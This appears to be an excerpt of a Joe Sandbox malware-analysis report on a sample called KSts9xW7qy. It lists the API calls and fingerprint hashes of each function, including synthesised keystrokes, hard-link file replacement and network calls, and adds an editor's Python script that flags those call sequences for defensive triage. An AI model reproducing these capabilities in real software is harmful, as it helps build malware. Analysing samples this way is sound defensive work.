                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 3877424927-0
                                                                        • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                        • Instruction ID: ce6cc9b3316a55e5fd33d02074cfc6a6cad69ca8637e6e1b686365d9b7782126
                                                                        • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                        • Instruction Fuzzy Hash: 8551A1B1A00305ABDF28DFB988846AF77A1AF40324F24972AF825B62D1D7709F508B41
                                                                        APIs
                                                                        • GetWindowRect.USER32(015E6678,?), ref: 00EDC544
                                                                        • ScreenToClient.USER32(?,00000002), ref: 00EDC574
                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00EDC5DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientMoveRectScreen
                                                                        • String ID:
                                                                        • API String ID: 3880355969-0
                                                                        • Opcode ID: 9cf95e13be6feed4fb30e2f3b8dd771465ef08f5b80570a918fd148579537e42
                                                                        • Instruction ID: 5ec364b365d3a417c29c9d62b683dce0490295cf80d2c9553b2202ead75af81c
                                                                        • Opcode Fuzzy Hash: 9cf95e13be6feed4fb30e2f3b8dd771465ef08f5b80570a918fd148579537e42
                                                                        • Instruction Fuzzy Hash: A9516E75900109EFCF10DF68D881AAE7BB6FB45764F20925AF825AB390D730ED42CB90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00EAC462
                                                                        • __itow.LIBCMT ref: 00EAC49C
                                                                          • Part of subcall function 00EAC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00EAC753
                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00EAC505
                                                                        • __itow.LIBCMT ref: 00EAC55A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 268b8cf91c18c3da5d42c5061724fa775dc6c738f04a22f3f59f75b5fc97e1c8
                                                                        • Instruction ID: 6a060a019aa579166d4ebf58e70523def0e5c11c0622f8daa4fd117d662feaf3
                                                                        • Opcode Fuzzy Hash: 268b8cf91c18c3da5d42c5061724fa775dc6c738f04a22f3f59f75b5fc97e1c8
                                                                        • Instruction Fuzzy Hash: 1941E531A00608AFDF25EF54C851BEE7BF9AF4E714F105059F909BB281DB70AA45CBA1
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EB3966
                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EB3982
                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00EB39EF
                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00EB3A4D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: b30935d110dcb6fe85a4a75a25031a4a0bc9ff247b571d435db21b804eafceb0
                                                                        • Instruction ID: 7b1bea4346a7f1437b62eefde4d5a09af0f4b0cf4b6548772962a3e251f3393a
                                                                        • Opcode Fuzzy Hash: b30935d110dcb6fe85a4a75a25031a4a0bc9ff247b571d435db21b804eafceb0
                                                                        • Instruction Fuzzy Hash: F0412570E04208AEEF218B758807BFFBBB9AF85315F04215AE5C1B62D1C7B49E85D761
                                                                        APIs
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EBE742
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00EBE768
                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EBE78D
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EBE7B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 3321077145-0
                                                                        • Opcode ID: d97bc324d6a280030819033f67e18730059fdcb9832e56b9f72c3721d177b335
                                                                        • Instruction ID: 86ed474635e7f86c71f6d9a8055de706cfd1d4c8f9e2bae2798c16d56ed8dc26
                                                                        • Opcode Fuzzy Hash: d97bc324d6a280030819033f67e18730059fdcb9832e56b9f72c3721d177b335
                                                                        • Instruction Fuzzy Hash: 13413539600610DFCB11EF15C445A9EBBE6BF99710B19D099E94ABB3A2CB30FC00CB91
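The records above all share one layout: an "APIs" list of resolved calls with their arguments and call-site address, followed by the "Similarity" fingerprint fields. Reading them by eye across thousands of functions is slow, so the following added script (written for this page; it is neither Joe Sandbox code nor code recovered from the sample) parses that layout into records and flags three call sequences visible in this report: LoadLibrary followed by GetProcAddress (runtime API resolution, with the resolved symbol extracted), DeleteFileW followed by CreateHardLinkW (an existing file at the link path is removed and re-created as a hard link), and SetKeyboardState combined with SendInput or PostMessageW (synthesised keystrokes). The sample input is three records copied from this page and trimmed to the fields the parser uses; the rule names and the "worth a closer look" judgement are the editor's, not verdicts from the report.

```python
"""Parse per-function records of a Joe Sandbox report and flag call sequences.
Added illustration only; not Joe Sandbox code and not code from the sample."""
import re
from dataclasses import dataclass, field

# Constructed input: three records copied from this report, trimmed to the
# fields the parser uses. The "Instruction Fuzzy Hash" line closes a record.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00ED3BD1,?,00ED3E06), ref: 00ED3BE9
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00ED3BFB
Similarity
• API ID: AddressLibraryLoadProc
• Instruction Fuzzy Hash: 5AD0A770414722DFC7205F71FC08613FEF5EB01318B10442AE445F2250E6F0D484CE22
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EB3966
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00EB3982
• PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00EB39EF
• SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00EB3A4D
Similarity
• API ID: KeyboardState$InputMessagePostSend
• Instruction Fuzzy Hash: F0412570E04208AEEF218B758807BFFBBB9AF85315F04215AE5C1B62D1C7B49E85D761
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EBE742
• GetLastError.KERNEL32(?,00000000), ref: 00EBE768
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EBE78D
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EBE7B9
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• Instruction Fuzzy Hash: 13413539600610DFCB11EF15C445A9EBBE6BF99710B19D099E94ABB3A2CB30FC00CB91
"""

# "• Name.MODULE(args), ref: ADDR"; the argument list is optional (e.g.
# "• CoUninitialize.OLE32 ref: ...") and a line may carry a
# "Part of subcall function ADDR:" prefix, as in the report.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall: str = ""   # callee address when the API is reached through a subcall

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # "API ID", "Opcode ID", ...

    @property
    def api_id(self):
        return self.fields.get("API ID", "")

def parse_records(text):
    """Split report text into FunctionRecords in document order."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] or ""))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.fields[f["key"]] = f["val"]
            if f["key"] == "Instruction Fuzzy Hash":   # last field of a record
                records.append(cur)
                cur = FunctionRecord()
    if cur.calls or cur.fields:   # record cut off at the end of the page
        records.append(cur)
    return records

def triage(records):
    """Return (record_index, rule, detail) tuples for the sequences below."""
    out = []
    for i, rec in enumerate(records):
        names = [c.name for c in rec.calls]
        # LoadLibrary* followed by GetProcAddress: runtime API resolution. Normal
        # for an AutoIt runtime, but the resolved symbol names the capability.
        lib = ""
        for c in rec.calls:
            if c.name.startswith("LoadLibrary") and c.args:
                lib = c.args[0]
            elif c.name == "GetProcAddress" and lib and len(c.args) > 1:
                out.append((i, "dynamic_resolution", f"{lib}!{c.args[1]}"))
        # DeleteFileW then CreateHardLinkW: whatever sits at the link path is
        # removed and the path re-created as a hard link to another file.
        if "DeleteFileW" in names and "CreateHardLinkW" in names[names.index("DeleteFileW"):]:
            out.append((i, "hardlink_overwrite", rec.api_id))
        # SetKeyboardState with SendInput/PostMessageW: synthesised keystrokes.
        if "SetKeyboardState" in names and ({"SendInput", "PostMessageW"} & set(names)):
            out.append((i, "synthetic_input", rec.api_id))
    return out

if __name__ == "__main__":
    for idx, rule, detail in triage(parse_records(SAMPLE)):
        print(f"record {idx}: {rule} {detail}")
```

Run it against a copy of the report's text rather than SAMPLE to list every function that resolves an API at runtime; the detail string (library!symbol) is what you would compare against the AutoIt runtime's own resolution table to separate interpreter housekeeping from script-driven behaviour. The "Instruction Fuzzy Hash" line is used as the record terminator because it is the last field of every record on this page; a report exported in a different layout would need a different terminator.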
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EDB5D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: b5dbf07212585e3973ab56db467a8f34f8fe0f90372d08c598f47fb318cfb8d4
                                                                        • Instruction ID: 9b60bbd1584688e97beaf4061a846c866ea58e1429bb22af049a8f32d8776091
                                                                        • Opcode Fuzzy Hash: b5dbf07212585e3973ab56db467a8f34f8fe0f90372d08c598f47fb318cfb8d4
                                                                        • Instruction Fuzzy Hash: 4A31AD74600108EFEB209E599C85FAD37A6EB06364F666103F662F63E1E730E9429B51
                                                                        APIs
                                                                        • ClientToScreen.USER32(?,?), ref: 00EDD807
                                                                        • GetWindowRect.USER32(?,?), ref: 00EDD87D
                                                                        • PtInRect.USER32(?,?,00EDED5A), ref: 00EDD88D
                                                                        • MessageBeep.USER32(00000000), ref: 00EDD8FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: 0c408fc4de8f20b82347c689a13f2f5baae98e2f024a043b8236a22f223c85e8
                                                                        • Instruction ID: 969d949875e3327015efefaaace1c7211f28b3d91b8994b1cf73d96ce9f0b32a
                                                                        • Opcode Fuzzy Hash: 0c408fc4de8f20b82347c689a13f2f5baae98e2f024a043b8236a22f223c85e8
                                                                        • Instruction Fuzzy Hash: B741C178A08208DFCB16CF99CC81BA97BF6FF44314F1891A6E415AB354C331E846EB40
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00EB3AB8
                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EB3AD4
                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00EB3B34
                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00EB3B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 6fded89b16d0c41fb20812d6c39c7e7ce42353955a8265595de26bc42fa559b3
                                                                        • Instruction ID: 2546d2001a56cec3efc839c817924b01c49b420c746ee76c4c46c58be64773ca
                                                                        • Opcode Fuzzy Hash: 6fded89b16d0c41fb20812d6c39c7e7ce42353955a8265595de26bc42fa559b3
                                                                        • Instruction Fuzzy Hash: 1E312470A04258AEEF318B758C5ABFFBFAA9B45314F04225AE481B32D1C7749F45C761
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EA4038
                                                                        • __isleadbyte_l.LIBCMT ref: 00EA4066
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00EA4094
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00EA40CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 5d0f08a0269c9d4dbc02285b53cce4eee2df90bd35b89cdc01bc633cfb5c3a65
                                                                        • Instruction ID: 1e17ac77939ca2d63aecd742558b57b01f450d68c3ee281ff882deeec983112d
                                                                        • Opcode Fuzzy Hash: 5d0f08a0269c9d4dbc02285b53cce4eee2df90bd35b89cdc01bc633cfb5c3a65
                                                                        • Instruction Fuzzy Hash: AD31C370600206AFDB219F34C885BBA7BE5BF8A314F155028E651AB0D0D771E890E792
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00ED7CB9
                                                                          • Part of subcall function 00EB5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EB5F6F
                                                                          • Part of subcall function 00EB5F55: GetCurrentThreadId.KERNEL32 ref: 00EB5F76
                                                                          • Part of subcall function 00EB5F55: AttachThreadInput.USER32(00000000,?,00EB781F), ref: 00EB5F7D
                                                                        • GetCaretPos.USER32(?), ref: 00ED7CCA
                                                                        • ClientToScreen.USER32(00000000,?), ref: 00ED7D03
                                                                        • GetForegroundWindow.USER32 ref: 00ED7D09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                        • String ID:
                                                                        • API String ID: 2759813231-0
                                                                        • Opcode ID: 6a67c5bc2ac32e556a94962daa922273ea4798e0b2ef620dd10a2d93e112b9f6
                                                                        • Instruction ID: 30da1730d91074c01015590c9b9508fcc648599eda2733145d8623e6f798bd1a
                                                                        • Opcode Fuzzy Hash: 6a67c5bc2ac32e556a94962daa922273ea4798e0b2ef620dd10a2d93e112b9f6
                                                                        • Instruction Fuzzy Hash: 4E31EC72900108AFDB11EFA5D8459FFFBF9EF98314B10946AE919F7211DB319A05CBA0
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • GetCursorPos.USER32(?), ref: 00EDF211
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EEE4C0,?,?,?,?,?), ref: 00EDF226
                                                                        • GetCursorPos.USER32(?), ref: 00EDF270
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EEE4C0,?,?,?), ref: 00EDF2A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                        • String ID:
                                                                        • API String ID: 2864067406-0
                                                                        • Opcode ID: d93d09ed41be51df8d36257a0d0e74782e80c1ea4477884a42b2ae565c413d26
                                                                        • Instruction ID: 8a954f7c11a2abd50518b533a82cfaa3bad9fd7011097d0f700349ae8f1eef41
                                                                        • Opcode Fuzzy Hash: d93d09ed41be51df8d36257a0d0e74782e80c1ea4477884a42b2ae565c413d26
                                                                        • Instruction Fuzzy Hash: 8A218D39500018EFCB15DF95D859EFA7BB6FB49324F04446AF90A6B2A1D3309952DB50
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EC4358
                                                                          • Part of subcall function 00EC43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EC4401
                                                                          • Part of subcall function 00EC43E2: InternetCloseHandle.WININET(00000000), ref: 00EC449E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 1463438336-0
                                                                        • Opcode ID: a5b68677c49723164e7f6f1a683a755a9c109c106db57a4546885c61dd9e3ec1
                                                                        • Instruction ID: 1201ce10baa6099764b5f33103095d1d5dd21c80b61dd4efc3b4b8b6edc33748
                                                                        • Opcode Fuzzy Hash: a5b68677c49723164e7f6f1a683a755a9c109c106db57a4546885c61dd9e3ec1
                                                                        • Instruction Fuzzy Hash: DB2104B1200601BFDB119F648D10FBBBBE9FFC4714F10501EBA05A66D0D77298229790
                                                                        APIs
                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00EC8AE0
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00EC8AF2
                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00EC8AFF
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8B16
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastacceptselect
                                                                        • String ID:
                                                                        • API String ID: 385091864-0
                                                                        • Opcode ID: a069a520707e49df456ba496a373e03f3a925b1f301b21b70eccdb7b2af0e7a5
                                                                        • Instruction ID: fd7841bb7d730fc487ace4b850365109e3dfddc6e64e75c06263ccfc62f340f5
                                                                        • Opcode Fuzzy Hash: a069a520707e49df456ba496a373e03f3a925b1f301b21b70eccdb7b2af0e7a5
                                                                        • Instruction Fuzzy Hash: 54219671A001249FC7119F69CD85AAEBBFCEF89310F00516AF849E7291DB749D45CF90
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00ED8AA6
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00ED8AC0
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00ED8ACE
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00ED8ADC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayered
                                                                        • String ID:
